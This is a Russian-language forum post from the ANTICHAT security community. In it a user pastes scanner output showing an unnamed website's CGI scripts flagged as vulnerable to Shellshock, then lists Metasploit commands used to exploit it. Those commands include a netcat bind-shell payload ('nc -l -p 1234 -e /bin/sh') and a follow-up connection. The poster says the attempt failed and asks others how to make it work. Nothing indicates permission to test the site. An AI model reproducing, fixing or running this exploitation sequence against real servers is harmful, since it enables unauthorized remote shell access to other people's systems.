OSVDB-112004 — ANTICHAT Forum

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

28.05.2017, 21:11

YI7bIPb

Guest

Сообщений: n/a

Провел на форуме:
1973

Репутация: 0

Server banner has changed from 'Apache' to 'AkamaiGHost' which may suggest a WAF, load balancer or proxy is in place

+ OSVDB-112004: /cgi-bin/admin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).

+ OSVDB-112004: /cgi-bin/administrator.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).

+ OSVDB-112004: /cgi-bin/authLogin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).

+ OSVDB-112004: /cgi-bin/bb-hist.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename...=CVE-2014-6278).

Открываю Метасплойт.... пишу туда:

search 2014-6278

нашел 3 експлойта, вел дальше так set auxiliary/scanner/http/apache_mod_cgi_bash_env

set CMD /usr/bin/nc -l -p 1234 -e /bin/sh зачем не знаю, увидел точно такую же в видео в Ютубе и сделал так же... Сылка на видео в конце будет

дальше set RHOSTS 0.0.0.0 (сайт)

set TARGETURI /cgi-bin/administrator.cgi

exploit пишет что прошел потом открываю консоль пишу:

nc 0.0.0.0 1234 и там не чего не выдает кароче.....

делал по этому видео

Кому не лень подскажите че к чему